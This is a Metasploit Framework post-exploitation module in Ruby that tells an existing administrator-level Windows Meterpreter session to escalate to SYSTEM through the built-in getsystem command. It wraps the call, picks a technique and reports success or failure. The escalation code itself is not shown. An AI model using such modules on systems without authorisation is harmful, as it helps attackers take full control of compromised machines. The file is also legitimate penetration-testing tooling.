metasploit-framework/modules/post/windows/escalate/getsystem.rb


##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'metasm'
require 'msf/core/post/windows/priv'
# Post module that asks an existing Windows Meterpreter session to run its
# built-in 'getsystem' command. Per the module description, the session must
# already belong to an administrator account. The escalation itself is
# performed by the session's priv extension (client.priv.getsystem); this
# class only selects the technique and reports the outcome.
class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Priv

  # Registers the module metadata and the optional TECHNIQUE setting.
  #
  # @param info [Hash] caller-supplied metadata, merged through update_info
  def initialize(info = {})
    module_info = {
      'Name' => 'Windows Escalate Get System via Administrator',
      # Same text as the original %q{} literal, including the leading and
      # trailing newline.
      'Description' => "\nThis module uses the builtin 'getsystem' command to escalate\n" \
                       "the current session to the SYSTEM account from an administrator\n" \
                       "user account.\n",
      'License' => MSF_LICENSE,
      'Author' => 'hdm',
      'Version' => '$Revision$',
      'Platform' => ['win'],
      'SessionTypes' => ['meterpreter']
    }
    super(update_info(info, module_info))

    # Optional integer setting; the default of 0 is described by the help
    # text as "try them all".
    technique_opt = OptInt.new(
      'TECHNIQUE',
      [false, "Specify a particular technique to use (1-4), otherwise try them all", 0]
    )
    register_options([technique_opt], self.class)
  end

  # Reports that the session cannot be used and aborts the run.
  #
  # @raise [Rex::Script::Completed] always
  def unsupported
    print_error('This version of Meterpreter is not supported with this script!')
    raise Rex::Script::Completed
  end

  # Runs the module: checks the session platform, returns early when the
  # session is already SYSTEM, otherwise calls getsystem and prints the result.
  def run
    # NOTE(review): the help text documents 1-4, but the value is not
    # range-checked here; it is handed to getsystem unchanged.
    technique = datastore['TECHNIQUE'].to_i

    # Only sessions whose platform string mentions win32 or win64 continue.
    unsupported unless client.platform =~ /win32|win64/i

    if is_system?
      print_good('This session already has SYSTEM privileges')
      return
    end

    # The result is indexed: [0] is treated as the success flag and [1] is
    # printed as the technique number.
    outcome = client.priv.getsystem(technique)
    escalated = outcome && outcome[0]

    if escalated
      print_good("Obtained SYSTEM via technique #{outcome[1]}")
    else
      print_error('Failed to obtain SYSTEM access')
    end
  end
end